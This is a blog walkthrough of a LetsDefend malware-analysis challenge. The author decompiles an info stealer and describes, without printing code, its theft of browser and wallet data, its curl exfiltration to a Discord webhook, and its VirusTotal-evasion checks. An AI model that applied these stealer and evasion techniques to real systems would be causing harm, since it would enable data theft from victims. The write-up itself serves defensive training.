LetsDefend — DLL Stealer Challenge Walkthrough
Analyzing DLL Stealer Malware with dotPeek and MITRE ATT&CK
Introduction:
Have you ever wanted to try to reverse engineer an info stealer malware sample, see how it works, and determine how it could impact its victim? If this sounds interesting to you, you’ve stumbled on the right blog! Stick around for my weekly walkthrough where we’re going to take on the DLL Stealer challenge from LetsDefend!
DLL Stealer is an introductory malware reverse engineering challenge that has us using JetBrains dotPeek to decompile and analyze an information stealer malware sample. By analyzing the malware, we’re going to determine its capabilities, what data it tries to steal, and how it exfiltrates the information — fun stuff!
To set the stage, malware reverse engineering is not my strongest skill, but practice makes perfect, so we will stumble through this one together and build up our knowledge along the way. That being said, I won’t have as many real-world application tips this time around so instead I’m providing plenty of reference links to MITRE ATT&CK to add some additional context about the tactics, techniques, and procedures (TTPs) used by the malware.
Now let’s put on our detective hats and have some fun with forensics. Thanks for reading along!
Challenge Link: https://app.letsdefend.io/challenge/dll-stealer
Challenge Scenario:
You work as a cybersecurity analyst for a major corporation. Recently, your company’s security team detected some suspicious activity on the network. It appears that a new DLL Stealer malware has infiltrated your system, and it’s causing concern due to its ability to exfiltrate critical DLL files from your system.
Question 1: What is the DLL that has the stealer code?
Let’s jump right in and connect to the provided virtual machine and extract the challenge file archive within the ChallengeFile folder.
Typically, it’s a good idea to get familiar with the provided tools so that we have some idea of what’s available to tackle the challenge. Let’s review the Tools folder on the Desktop. Right away, we’ll see several available disassemblers, debuggers, and decompilers which will be helpful to dig into the provided malware sample.
However, since reverse engineering is not my strong suit, we’ll look at question hint as a jumping-off point:
Awesome! This will be my first time using dotPeek. Let’s take a moment to check out the project’s website to understand what it is and take a quick look at the documentation available.
Cool, now that we have done a little research, let’s jump into dotPeek and start the investigation. Open the ChallengeFile folder, right-click the extracted sample, and select “Open With > JetBrains dotPeek.”
This will launch dotPeek and load the file. Don’t worry, it will take a few minutes to load the assembly explorer, but when it does, expand the node (the one with the sample name) so that we can see the two DLL files contained within the executable:
1. Colorful
2. Test-Anitnazim.
Since we need to find the name of the specific DLL that contains the info stealer code, we’ll just start at the top of the list and expand the Colorful node so that we can peek into all the assemblies. We’ll see a few different functions that we need to look through to see if we can discover any malicious code.
After a brief scan of the code, we’ll see evidence of suspicious data staging (T1074.001) and collection (T1005) activity targeting common directories of interest for info stealers like web browser databases, cryptocurrency wallet addresses, online gaming platforms, social media accounts, etc.
Scrolling even further to the end of the code, we even see some evidence of data exfiltration (T1048) with the curl command to send the data.
We’ll stop here for now. This is enough evidence to determine that we discovered the DLL that contains the stealer code. Let’s submit our findings to answer Question 1.
Question 2: What is the anti-analysis method used by the malware?
Sometimes, malware performs checks to see if it is being executed in virtual or sandbox environments and will adjust its behavior or terminate to avoid detection by analysts. Question 2 suggests that there is some anti-analysis mechanism our sample, so let’s see if we can find it!
We’ll go back into the assembly explorer in dotPeek, check out the IsVirusTotal(): bool under the Colorful function, and examine the code.
Let’s focus on these interesting lines of code:
It seems that the program tries to detect if it is being analyzed by VirusTotal by using a series of system checks for unique values typically used by the VirusTotal analysis engines during automated scanning including: username, machine name, and download location.
Then, it looks for a true or false value (Boolean) — if the application returns true, the program has determined that is being analyzed by VirusTotal and then the program then ends to evade further analysis.
This is an example of a defense evasion tactic that we touched on earlier (T1497.001) where, according to MITRE ATT&CK:
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.
All of that said, since the program seems to check if it is being analyzed by VirusTotal, I think we’ve found the anti-analysis method we are looking for to answer Question 2!
Question 3: What is the full command used to gather information from the system into the “productkey.txt” file?
Now, let’s search the code and see if we can analyze some specific capabilities of the stealer functions. We are going to search for the command that the malware uses to enumerate and collect the victim’s Windows product key.
Fortunately, this is pretty straightforward, and we can simply use the find feature (CTRL+F) in dotPeek to search for the keyword “productkey.txt.”
Taking a closer look at the command, this is using the Windows Management Instrumentation Command Line (WMIC) to query the software licensing class for the value containing the Windows product key.
Question 4: What is the full command used to gather information through the “ips.txt” file?
We’ll approach Question 4 the same way we approached the previous question except this time, we will search for “ips.txt.” This will help us locate the output file so that we can see the preceding command.
Once we locate the ips.txt file, we can see that the IP addresses were enumerated through the ipconfig /all command (T1016).
Question 5: What is the webhook used by the malware?
Okay, last question! Remember back in Question 1 that we found some evidence of data being staged for exfiltration? Let’s revisit those lines of code. To speed this process up, let’s leverage dotPeek’s find function again and search for “webhook” to take us to the right location.
This will show us the correct webhook URL to answer Question 5! But, let’s take a moment to understand how this works by referencing MITRE ATT&CK for more context of this technique (T1567.004).
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.[1] Many public and commercial services, such as Discord, Slack, and
webhook.site, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.
To summarize this in the context of this info stealer, after the malware collects the data, it is exfiltrated using curl to send data to the attacker’s Discord server by leveraging Discord’s webhook functionality.
Now that we have determined the webhook URL, let’s submit the answer and wrap up this investigation!
Conclusion:
There we have it! We have finished our analysis of the DLL Stealer malware, uncovered its functionality, anti-analysis method, targeted data, and the exfiltration method. It’s time for the postmortem report and to close out this walkthrough of the DLL Stealer challenge!
A big thank you to LetsDefend for this awesome challenge! This lab was a fun opportunity to level-up my reverse engineering skills and introduce me to the dotPeek tool. I appreciate that this challenge was on the shorter side but got me really interested in analyzing and interpreting the malware sample. By referencing MITRE ATT&CK throughout this walkthrough I was able to really dive in, engage with, and understand the challenge beyond the required questions. I hope that you found it valuable and had as much fun as I did learning something new, too!
And hey, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!
Until next week — stay curious.
Tools & References:
JetBrains dotPeek: https://www.jetbrains.com/help/decompiler/dotPeek_Introduction.html
MITRE ATT&CK (T1074.001 — Data Staged: Local Data Staging): https://attack.mitre.org/techniques/T1074/001/
MITRE ATT&CK (T1005 — Data from Local System): https://attack.mitre.org/techniques/T1005/
MITRE ATT&CK (T1048 — Exfiltration Over Alternative Protocol): https://attack.mitre.org/techniques/T1048/
curl: https://curl.se/docs/manpage.html
VirusTotal: https://www.virustotal.com/
Wikipedia — Boolean Definition: https://en.wikipedia.org/wiki/Boolean_data_type
MITRE ATT&CK (T1497.001 — Virtualization/Sandbox Evasions: System Checks): https://attack.mitre.org/techniques/T1497/001/
MITRE ATT&CK (T1016 — System Network Configuration Discovery): https://attack.mitre.org/techniques/T1016/
MITRE ATT&CK (T1567.004 Exfiltration Over Web Service: Exfiltration Over Webhook): https://attack.mitre.org/techniques/T1567/004/
